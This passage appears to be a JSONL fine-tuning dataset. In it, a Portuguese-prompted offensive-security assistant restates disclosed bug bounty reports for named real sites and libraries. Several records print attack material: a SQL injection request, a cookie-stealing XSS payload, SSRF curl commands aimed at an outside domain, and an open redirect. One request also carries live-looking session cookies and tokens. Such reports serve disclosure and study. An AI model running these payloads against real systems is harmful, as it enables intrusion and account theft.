ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: HTTP2 'unknownProtocol' cause Denial of Service by resource exhaustion"}, {"role": "assistant", "content": "### Passos para Reproduzir\nThe following steps assume you are on a linux system. Everything will run on your host system. The IP in the client is hard-coded to `127.0.0.1` and the port is `50000`. The scripts are kept as simple as possible. \n\n1. Create a file `client.sh` with the content provided in the Supporting Material section below (don't start it now)\n2. Create the Javascript file (see Supporting Material section below) and run the example server (may you want to customize the port). You can also start a non-secure server using `createServer()` if you don't have an example key or cert around.\n3. You query the file descriptors with the command provided in the Supporting Material section below. Simply replace `{PID}` with the process id of your node server.\n4. Maybe you also want to watch the memory consumption with the tool you prefer.\n5. Now you are ready to start the client script.\n\nWe initially found this issue by running the Greenbone Vulnerability Manager on our server port with the **OvenVAS default** scanner, the **Fast and ultimate** configuration with all kind of vulnerability tests enabled and the **TCP-SYN Service Ping** alive check.\n\nThe affected code that causes this issue seems to be [here](https://github.com/nodejs/node/blob/c0ac692ba786f235f9a4938f52eede751a6a73c9/lib/internal/http2/core.js#L2918-L2929).\n\nWe are running on Linux x86 with kernel v4.19.148 with node v12.19.0.\n\n### Impacto\n:\nAny code that relies on the http2 server is affected by this behaviour. For example the JavaScript implementation of GRPC also uses a http2 server under the hood.\n\nThis attack has very low complexity and can easily trigger a DOS on an unprotected server.\n\nThe above server example consumes about 6MB memory after start-up. Running the described attack causes a memory consumption of more than 400MB in approximately 30s and holding more than 7000 file descriptors. Both, the file descriptors and the memory, are never freed."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [intensedebate.com] SQL Injection Time Based On /js/commentAction/"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nHello,\n\nI have found a SQLI Injection Time Based on `/js/commentAction/`.\n\nWhen a user want to submit/reply to a comment, a JSON payload was send by a GET request.\n\n\n```GET /js/commentAction/?data={\"request_type\":\"0\",+\"params\":+{+\"firstCall\":true,+\"src\":0,+\"blogpostid\":504704482,+\"acctid\":\"251219\",+\"parentid\":\"0\",+\"depth\":\"0\",+\"type\":\"1\",+\"token\":\"7D0GVbxG10j8hndedjhegHsnfDrcv0Yh\",+\"anonName\":\"\",+\"anonEmail\":\"X\",+\"anonURL\":\"\",+\"userid\":\"26745290\",+\"token\":\"7D0GVbxG10j8hndedjhegHsnfDrcv0Yh\",+\"mblid\":\"1\",+\"tweetThis\":\"F\",+\"subscribeThis\":\"1\",+\"comment\":\"w\"}} HTTP/1.1\nHost: www.intensedebate.com```\n\nThe key `\"acctid\":\"251219\"` is vulnerable to SQL Injection Time based\n\n### Impacto\nFull database access holding private user information."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: CVE-2020-8285: FTP wildcard stack overflow"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nUser 'xnynx' on github filed [PR 6255](https://github.com/curl/curl/issues/6255) highlighting this problem. **Filed publicly**\n\nMy first gut reaction was that this had to be a problem with `curl_fnmatch` as that has caused us grief in the past (and on most platforms we use the native `fnmatch()` now, but not on Windows IIRC and this is a reported to happen on Windows), but I then built a test program and I made it crash in what seems like potential stack overflow due to recursive calls to `wc_statemach` from within itself.\n\n### Passos para Reproduzir\n1. build 6255.c (attached)\n 1. run it (with a debugger)\n 1. inspect the crash\n\nThe example app lists a directory with 40,000 files on funet.fi.\n\n### Impacto\nI haven't yet worked out exactly how to get what into the stack and what the worst kind of exploit of this might be, but a stack overflow that can be triggered by adding/crafting files in the server feels bad."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: SQL Injection Union Based"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nHello, \n\nI have found a SQL Injection Union Based on `https://intensedebate.com/commenthistory/$YourSiteId `\nThe `$YourSiteId` into the url is vulnerable to SQL Injection.\n\n### Impacto\nFull database access holding private user information and Reflected Cross-Site-Scripting"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: No rate limiting - Create data"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nHello team Stripo, how are you?\n\nI found a rate limit for data creation.\n\nTarget = https://my.stripo.email/cabinet/#/my-services/298427?tab=data-sources\n\nRequest to Post:\n\n```\nPOST /emailformdata/v1/amp-lists?projectId= HTTP/1.1\nHost: my.stripo.email\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/json;charset=UTF-8\nCache-Control: no-cache\nPragma: no-cache\nExpires: Sat, 01 Jan 2000 00:00:00 GMT\nX-XSRF-TOKEN: 3ef1a2b8-f640-457b-bac8-1d629d0f9498\nContent-Length: 198\nOrigin: https://my.stripo.email\nConnection: close\nReferer: https://my.stripo.email/cabinet/\nCookie: amplitude_id_246810a6e954a53a140e3232aac8f1a9stripo.email=eyJkZXZpY2VJZCI6ImU1NjAwZjk3LTFiY2QtNDIzOS1iZTczLWNmNWVhYmMzMTJkZFIiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTYwNjc0NjU3NzcwMCwibGFzdEV2ZW50VGltZSI6MTYwNjc0Njg1ODg3OCwiZXZlbnRJZCI6MCwiaWRlbnRpZnlJZCI6MCwic2VxdWVuY2VOdW1iZXIiOjB9; _pin_unauth=dWlkPU1UUTFZemczWlRFdE1HSXdOeTAwT1Rrd0xUbGxNVEl0TWpBeE16WmpZVE00WlRZNA; _ga=GA1.2.730792257.1605012362; _pin_unauth=dWlkPU1UUTFZemczWlRFdE1HSXdOeTAwT1Rrd0xUbGxNVEl0TWpBeE16WmpZVE00WlRZNA; G_ENABLED_IDPS=google; __stripe_mid=e5538cc4-3896-4b96-b703-711ef38535d3313b41; _ga=GA1.3.730792257.1605012362; _gid=GA1.2.1102057235.1606746578; __stripe_sid=fcbc15d6-fe33-41ca-bd12-ad2a6fd80eb5a7fc3c; token=eyJhbGciOiJSUzUxMiJ9.eyJhdXRoX3Rva2VuIjoie1widXNlckluZm9cIjp7XCJpZFwiOjI5NDA3NyxcImVtYWlsXCI6XCJqYWFhaGJvdW50eUBnbWFpbC5jb21cIixcImxvY2FsZUtleVwiOlwicHRcIixcImZpcnN0TmFtZVwiOlwic2NyaXB0XCIsXCJsYXN0TmFtZVwiOlwiYm91bnR5XCIsXCJmYWNlYm9va0lkXCI6bnVsbCxcIm5hbWVcIjpudWxsLFwicGhvbmVzXCI6W10sXCJhY3RpdmVcIjp0cnVlLFwiZ3VpZFwiOm51bGwsXCJhY3RpdmVQcm9qZWN0SWRcIjoyOTg0MjcsXCJzdXBlclVzZXJWMlwiOmZhbHNlLFwiZ2FJZFwiOlwiY2JlOWMzMjItMDNhNS00NzQxLTlkMjYtNTc3MTc1MGI0M2MwXCIsXCJvcmdhbml6YXRpb25JZFwiOjI5MzgxNCxcIm93bmVkUHJvamVjdHNcIjpbMjk4NDI3XSxcImZ1bGxOYW1lXCI6XCJzY3JpcHQgYm91bnR5XCJ9LFwiaXNzdWVkQXRcIjoxNjA2NzQ2NjIwODUxLFwiYXBpS2V5XCI6bnVsbCxcInByb2plY3RJZFwiOm51bGwsXCJ4c3JmVG9rZW5cIjpcIjNlZjFhMmI4LWY2NDAtNDU3Yi1iYWM4LTFkNjI5ZDBmOTQ5OFwiLFwicm9sZVwiOlwiQ0FCSU5FVF9VU0VSXCIsXCJhdXRob3JpdGllc1wiOltdfSIsImV4cCI6MTYwNjgzMzAyMH0.qRAbnSN-DZWyUTUezJREviXpSgK1o_8U-3Rgt0xioXjID4apoWkfmPjt0vSnMcTRiF3oNLZmLC2FqnnMlMqqZb_v1Pv9Dn_gHSWOAF2s9IHn0tfJVPPh0BMTxDYfcFlvfMnGz9DMx7v4ETv7PJcSUwDBlFCMXcQ-kEa0AcSjOj7edpMJ2T18Xje3MgLx0Iq_u44HhYWxMaclL8FisL6Dqa13hQKijlCiV-H_jJSxEGpHgtUE0RPBI7kmWSMdW6flncHdf43S7An15uNxe6Dq6dbkuP3wpO_nO6IwNJLcxnt6s9_-ETCHXZIjMuNTKTs5zi0GoOA1OJ_8A1kCkN2cGal5ghD3fKpC4Slk5HkriZCHSvGf7tBgWJY7JCWCNMvucuKsUAeDjucFxB-wscr7iX6q6huJpCsa8gNNL_qR6PzwYF1kHuBRPTHCtF_PEcuqnc6LGfe9mCe6khdfGDKELGoTg8FtjZ-ce84oIhNLOSajzkJ3pbQ2vXB8B3Sm4lkjU85RzTMYhrNAF0zz6ZOzYqShg-QG60Yr66i07OcUXbw66R0ZH8YmH-ildoRtoJKNyloEuVMi-mz-KYZcRda1GHdBX-iEMto3ZXW7YL08DjdM9y07f0GnsSY_lBr_--nq73PxFd415D1sduoKkTDoSzOYIGT3dBK2D2PXpxiUUTs; _gid=GA1.3.1102057235.1606746578; JSESSIONID=A774ECEC8E8D7FB9527BC02A723054F8; intercom-session-b1m243ec=VWpock85SEcyYnRMZlVJcms0N1VCelVvdXd5b0J6eTFEWFh1QWIrZUpzSUlwbW8yT2RpdnZJamRnM3JtL3QrNi0tSVpVekFtR0s5c3RYV29MOGg5OUpQdz09--5e28d4d448f59bec98135e9bf373ff2ad64ab50d; _gat_UA-96386569-1=1\n\n{\"projectId\":298427,\"name\":\"ukibxiv4daehs7wdnupej63kgbm1aq.burpcollaborator.net\",\"description\":\"ukibxiv4daehs7wdnupej63kgbm1aq.burpcollaborator.net\",\"url\":null,\"identifier\":null,\"sourceType\":\"JSON\"}\n```\nThanks @OFJAAAH\n\n### Impacto\nThe attacker can charge the application, creating massively."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Non-revoked API Key Disclosure in a Disclosed API Key Disclosure Report on Stripo"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nCan you imagine discovering an API key disclosure vulnerability in a disclosed API key disclosure report? The same thing is what I came across while going through the disclosed reports at Stripo Inc. Plus, the disclosed API key isn't even revoked, and therefore I am still able to use the same API key to fetch response from the target.\n\nI am talking about #983331 where a security researcher reported secret API key leakage vulnerability in a JavaScript file at Stripo. This report is disclosed on HackerOne, and the team at Stripo have forgotten to blur the API keys from the report before disclosing it to the public. The API keys from Aviary and YouTube are disclosed in that report, and I tried using these API keys, and found out that they can still be used to fetch response from YouTube's API using Stripo's disclosed API key. I didn't check on Aviary though since I found out that Aviary is already a defunct image editor.\n\n### Passos para Reproduzir\n\n\n### Impacto\nBy taking an advantage of this vulnerability, an attacker would be able to use Stripo's YouTube API Key for calling different API endpoints in services provided in the YouTube Data API."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: PHP Info Exposing Secrets at https://radio.mtn.bj/info"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nDuring recon I discovered a PHP Info file exposing environment variables such as; Laravel APP_KEY, Database username/password, SMTP username/password, etc.\n\n### Passos para Reproduzir\nVisit the following URL;\n```\nhttps://radio.mtn.bj/info\n```\nYou will be presented with a PHP Info file exposing environment / PHP Variables.\n\n### Impacto\nExposing passwords to critical services.\nProviding application keys used for encryption/decryption within the app.\nSending email coming from an official email address."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Abusing URL Parsers by long schema name"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThere is known technique to exploit inconsistency of URL parser and URL requester logic to perform Server Side Request Forgery attack. Firstly it was presented by Orange Tsai at [A New Era Of SSRF Exploiting URL Parser](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf). Firstly I found the familiar issue at old versions of curl, but exploit did not seems works at latest releases. But now I'm ready to share new exploit of issue.\n\n### Passos para Reproduzir\nSchema parser logic of curl library is vulnerable to \"Abusing URL Parsers\". Malicious user can use this weakness to bypass whitelist protection and perform Server Side Request Forgery against targets, that use vulnerable version of library.\n\n 1. curl \"ssrf3.twowaysyncapp.tk://google.com\" Protocol \"ssrf3.twowaysyncapp.tk\" not supported or disabled in libcurl\n 1. curl \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.twowaysyncapp.tk://google.com\" Host aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.twowaysyncapp.tk requested\n\n### Impacto\nIncorrect schema parser logic will allow malicious user to bypass protection mechanism and get access to the internal infrastructure of affected web servers."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [intensedebate.com] Open Redirect"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nI have found a Open Redirect on `https://intensedebate.com//fb-connect/logoutRedir.php?goto=`, the parameters `$_GET['goto']` is reflected to the HTTP-Header Response `Location`\n\nHTTP Request\n\n```\nGET /fb-connect/logoutRedir.php?goto=\\http://\\ HTTP/1.1\nHost: intensedebate.com\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nConnection: close\nCookie: y=y;\nUpgrade-Insecure-Requests: 1\n```\n\n\nHTTP Response\n\n```\nHTTP/1.1 302 Found\nServer: nginx\nDate: Thu, 03 Dec 2020 21:52:42 GMT\nContent-Type: text/html; charset=utf-8\nConnection: close\nP3P: CP=\"NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM\"\nSet-Cookie: fbName=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\nSet-Cookie: fbUrl=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\nSet-Cookie: fbPic=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\nLocation: \\http://\\\nContent-Length: 0\n```\n\n### Impacto\nAn attacker can use this vulnerability to redirect users to other malicious websites, which can be used for phishing and similar attacks"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Bypass Tracking Blocker Protection Using Slashes Without Protocol On The Image Source."}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\n- Some Way Has Been Discovered To Bypass Image Rewriting On HeyMail Using Slashes Without Protocol `\\/\\www.evil.com` That Allows Bypassing Tracking Blocker And Collect Users Information Via Emails.\n\n### Impacto\nBypassing Image Rewriting Function Witch Allows Trackers To Collect Users IPs Using Images."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [sub.wordpress.com] - XSS when adjust block Poll - Confirmation Message - On submission:Redirect to another webpage - Redirect address:[xss_payload]"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nDear Wordpress Team,\n\nToday when I tried to create a post with block \"Poll\" and I have found at Poll Block -> Confirmation Message -> On submission:Redirect to another webpage and Redirect address:[xss_payload]\n\nAt Redirect address line, I can save the ```javascript:alert(document.cookie)``` as an URL webpage after submit a poll. And when an authenticated wordpress user submitted a poll, their cookies may stolen by attacker\n\n### Passos para Reproduzir\n1- Logged in your wordpress website and create a post with block Poll, fill question and some choices\n\n{F1104221}\n 2- Adjust Poll Block, Confirmation Message -> On submission:Redirect to another webpage and Redirect address:javascript:alert(document.cookie) then click Update/Publish your post\n\n{F1104220}\n 3- Go to your created poll and Submit, you will see xss popup\n\n{F1104222}\n\nYou can see video PoC below for the steps:\n{F1104231}\n\n### Impacto\nSteal cookies"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Code Injection via Insecure Yaml.load"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThe Kubernetes repo and tool, [test-infra](https://github.com/kubernetes/test-infra), uses the insecure yaml.load() function to set or update the `Gubernator` configuration with a yaml file which allows for code injection.\nVulnerable Line of Code:\n[https://github.com/kubernetes/test-infra/blob/master/gubernator/main.py#L36](https://github.com/kubernetes/test-infra/blob/master/gubernator/main.py#L36)\n[https://github.com/kubernetes/test-infra/blob/master/gubernator/update_config.py#L35](https://github.com/kubernetes/test-infra/blob/master/gubernator/update_config.py#L35)\n[https://github.com/kubernetes/test-infra/blob/master/gubernator/update_config.py#L48](https://github.com/kubernetes/test-infra/blob/master/gubernator/update_config.py#L48) \nVulnerable Files and functions: main.py:get_app_config()\n update_config.py:main()\n\n### Passos para Reproduzir\n1. Install the `Gubernator` frontend.\n 2. save the provided `config.yaml` file as the configuration file for Guberator, keep the same name.\n 3. Once you update the configuration the poc should be executed and a `ls` should be executed. \n\nTo Facilitate the process I have created a poc.py script in which I extracted the vulnerable code blocks from the test-infra repository to simulate the tools behaviour (Only from the main.py to illustrate the concept, same applies to the other occurence).\n\n### Impacto\nAn attacker can exploit this vulnerability by crafting a malicious YAML file in order to execute system commands. An attacker can either find a way to load a malicious configuration file or entice a victim into loading it. This results in Command Execution.\nFor this reason I have marked the `User Interaction` of the CVSS score as required."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [intensedebate.com] No Rate Limit On The report Functionality Lead To Delete Any Comment When it is enabled"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nI have found a no rate limit issue on the report functionality.\nWhen you enabled the report functionality on your site, you can set a number of reports before deleting the comment reported.\nBy default, this functionality is unable, but if you enabled this and you set a $x number of reports before deleting the comment, an attacker can spamming this functionality and delete your comment.\n\n### Passos para Reproduzir\n1) Login at `https://intensedebate.com`\n2) Create your own site at `https://intensedebate.com/install`, and follow the instructions (use generic install)\n3) After setup your site, go to `https://www.intensedebate.com/user-dashboard`, on click to `Moderate`.\n\n {F1106120}\n\n4) Go to the comment setting by clicking to `Comments`\n\n{F1106122}\n\n5) Setup the Report functionality by checked the `Enable \"Report this comment\" button` and set a number of reports before deleting the comment to `10` and save it\n\n{F1106130}\n\n6) Go to your site and add a comment\n7) With a other account go to your site, and report the comment manually x10 \n8) After spam the Report functionality\n9) Refresh the page, and you will see the comment is deleted\n\n### Impacto\nDelete any comment in any site when the report functionality is enabled"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Stored XSS in wordpress.com"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nHello Team,\nI found the Stored XSS vulnerability in the Custom Style section, this vulnerability can result in an attacker to execute arbitrary JavaScript in the context of the attacked website and the attacked user. This can be abused to steal session cookies, performing requests in the name of the victim or for phishing attacks, by inviting the victim to become part of the manager or administrator.\n\n### Passos para Reproduzir\n1. As an attacker, go to the feedback section, then go to the Polling section.\n2. Add a new post or edit an existing post.\n3. Scroll down, click All Styles.\n4. Add a new Style.\n5. Named the temporary style, click Save Style.\n6. Change the Style Name with